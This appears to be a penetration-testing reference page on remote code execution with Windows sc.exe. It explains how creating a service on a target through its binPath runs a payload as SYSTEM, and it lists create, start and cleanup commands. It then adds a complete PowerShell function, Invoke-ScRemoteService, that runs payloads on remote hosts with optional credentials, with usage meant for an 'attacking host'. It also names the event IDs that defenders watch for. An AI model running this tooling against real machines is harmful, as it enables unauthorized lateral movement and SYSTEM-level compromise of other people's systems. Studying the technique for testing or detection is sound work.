sc.exe
sc.exe uses the following ports:
135/TCP, 49152-65535/TCP (DCE/RPC)
445/TCP (RPC over SMB Named Pipes)
139/TCP (RPC over SMB Named Pipes)
It requires the account used for the connection to be a member of the local Administrators group on the target (the Service Control Manager only grants the SC_MANAGER_CREATE_SERVICE right to administrators by default). sc.exe itself has no username/password option: it authenticates with the caller's current logon session, so alternate credentials have to be supplied beforehand, for example with net use \\TARGET\IPC$ /user:<domain>\<user> or by launching the shell with runas /netonly. One caveat for local (non-domain) accounts: unless the account is the built-in Administrator (RID 500) or LocalAccountTokenFilterPolicy is set to 1 on the target, UAC remote restrictions strip the administrative token from network logons and remote service creation fails with access denied.
Additional note
sc.exe connects to the Service Control Manager (services.exe), a privileged system process that runs as NT AUTHORITY\SYSTEM (the highest-privileged account on the local system). A service created with the binPath option runs under LocalSystem by default (unless another account is given with obj=), so a payload started this way runs as SYSTEM and, if the payload is configured appropriately, gives the attacker the highest-privileged shell on the box, essentially the equivalent of a root shell on Unix-like systems.
Two practical caveats. First, the SCM expects a real service binary (one that calls StartServiceCtrlDispatcher); an ordinary executable or a cmd /c command line is still executed, but sc.exe start reports error 1053 (or 1067) and the SCM does not keep the process alive, so the payload must detach or finish its work quickly. Second, service creation is noisy: the target records System event ID 7045 (a service was installed) with the service name and binPath, and Security event ID 4697 when service-install auditing is enabled, which is exactly what detection rules for psexec-style lateral movement key on.
Basic commands
```
# create (the space after "binPath=" and "start=" is required by sc.exe syntax)
sc.exe \\TARGET create <servicename> binPath= "<service_bin_file>" start= auto
# start
sc.exe \\TARGET start <servicename>
```
binPath: Specifies the path to the service binary file. This value can be used to perform remote code execution too, since whatever it points at is executed as SYSTEM.
start: Specifies the start type for the service. Refer to the sc.exe documentation for the full list of available options.
auto: Specifies a service that automatically starts each time the computer is restarted and runs even if no one logs on to the computer. For a one-off execution, start= demand avoids leaving a service that re-launches the payload on every reboot if cleanup fails.
Cleanup
```
sc.exe \\TARGET stop <servicename>
sc.exe \\TARGET delete <servicename>
```
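The full create / start / cleanup sequence above, wrapped in one PowerShell function with exit-code checks. This is an added example, not code from the original page; the function and parameter names are hypothetical. It assumes the caller's logon session (or the optional -Credential, which it hands to net use for the IPC$ connection) is a local administrator on TARGET and that TCP 445 (or 135 plus the dynamic RPC range) is reachable. It defaults to start= demand rather than the page's start= auto so a temporary service does not survive a reboot if cleanup fails; pass -StartType auto for the page's behaviour.

```powershell
function Invoke-ScRemoteService {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Target,       # hostname or IP of the remote machine
        [Parameter(Mandatory)] [string] $ServiceName,  # name of the temporary service
        [Parameter(Mandatory)] [string] $BinPath,      # binary or command line to run as SYSTEM
        [ValidateSet('auto', 'demand')] [string] $StartType = 'demand',
        [pscredential] $Credential                     # optional explicit admin credentials
    )

    # 'sc' is a PowerShell alias for Set-Content, so the tool must be called as sc.exe.
    $scm = "\\$Target"
    $ipc = "\\$Target\IPC`$"
    $sessionOpened = $false
    $created = $false

    try {
        if ($Credential) {
            # sc.exe has no credential switch: authenticate the SMB session to the target first.
            # (The password goes on the command line; fine for a lab, not for production tooling.)
            $nc = $Credential.GetNetworkCredential()
            $user = if ($nc.Domain) { "$($nc.Domain)\$($nc.UserName)" } else { $nc.UserName }
            & net.exe use $ipc "/user:$user" $nc.Password 2>&1 | Out-Null
            if ($LASTEXITCODE -ne 0) { throw "net use to $ipc failed (exit $LASTEXITCODE)" }
            $sessionOpened = $true
        }

        # 1. create. sc.exe requires a space after 'binPath=' and 'start='; passing the
        #    option name and its value as two separate arguments reproduces that exactly.
        $createOut = & sc.exe $scm create $ServiceName 'binPath=' $BinPath 'start=' $StartType 2>&1
        if ($LASTEXITCODE -ne 0) { throw "create failed (exit $LASTEXITCODE): $createOut" }
        $created = $true

        # 2. start. Exit 0 means the binary behaved like a real service. A plain executable or
        #    a 'cmd /c ...' command line typically returns 1053 (no response) or 1067 (exited);
        #    the payload has normally run by then, but the SCM will not keep the process alive.
        $startOut = & sc.exe $scm start $ServiceName 2>&1
        $startCode = $LASTEXITCODE
        $result = switch ($startCode) {
            0       { 'running' }
            1053    { 'started, not a service binary (timeout)' }
            1067    { 'started, not a service binary (exited)' }
            default { "start failed (exit $startCode)" }
        }

        [pscustomobject]@{
            Target      = $Target
            ServiceName = $ServiceName
            StartCode   = $startCode
            Result      = $result
            Output      = (($startOut | ForEach-Object { "$_" }) -join "`n")
        }
    }
    finally {
        # 3. cleanup. 'stop' may fail if the service never reached RUNNING; 'delete' must
        #    succeed, otherwise the service definition (and its binPath) stays on the target.
        if ($created) {
            & sc.exe $scm stop $ServiceName 2>&1 | Out-Null
            & sc.exe $scm delete $ServiceName 2>&1 | Out-Null
            if ($LASTEXITCODE -ne 0) {
                Write-Warning "delete of $ServiceName on $Target failed (exit $LASTEXITCODE); remove it manually"
            }
        }
        if ($sessionOpened) { & net.exe use $ipc /delete 2>&1 | Out-Null }
    }
}

# Usage (placeholders; run from the attacking host):
# Invoke-ScRemoteService -Target 'TARGET' -ServiceName 'updsvc' -BinPath 'C:\Windows\Temp\payload.exe'
# Invoke-ScRemoteService -Target 'TARGET' -ServiceName 'updsvc' `
#     -BinPath 'cmd.exe /c whoami > C:\Windows\Temp\out.txt' -Credential (Get-Credential)
```

The try/finally ordering is the point of the wrapper: whatever sc.exe start returns, the stop and delete from the Cleanup section run, so a failed or non-service payload does not leave a SYSTEM service definition behind. Every sc.exe invocation is checked through $LASTEXITCODE because sc.exe returns the Win32 error code rather than writing to the error stream, so a plain pipeline would otherwise swallow a failed create or delete.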